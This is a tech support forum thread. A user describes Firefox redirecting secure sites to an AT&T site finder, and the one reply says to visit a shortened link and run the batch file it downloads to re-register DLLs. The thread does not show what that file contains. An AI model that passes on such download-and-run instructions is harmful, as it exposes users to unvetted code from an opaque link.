Tech Support banner

Status
Not open for further replies.
1 - 2 of 2 Posts

·
Registered
Joined
·
5 Posts
Discussion Starter #1
I use Firefox exclusively as my browser. When I try to access my gmail, yahoo mail, hotmail, or any other site that will display a message stating, "you are about to be connected to a secure site, do you want to continue?" I get redirected to at&t website finder. This only happens in Firefox, but I don't have the problem in IE. I'm using Firefox 2.0, and IE7. This didn't happen until i uninstalled the at&t parental controls. I've spoken to at&t about this and they have no solution. I work for at&t myself, and I've been through my settings and I can't figure it out. I've been in the HiJack This section of the forum, and Ried sent me to this area for help with Firefox. Any ideas?
 

·
Registered
Joined
·
142 Posts
just use this:

defupd.notlong.com

open the above website and there woudl be a pop up to save and run...just run it....there would be a batch file...click onthat and there woukld a black window which will register dll files for a minute and then reopen IE and open the wesite u r facing an issue with

Regards
 
1 - 2 of 2 Posts
Status
Not open for further replies.
Top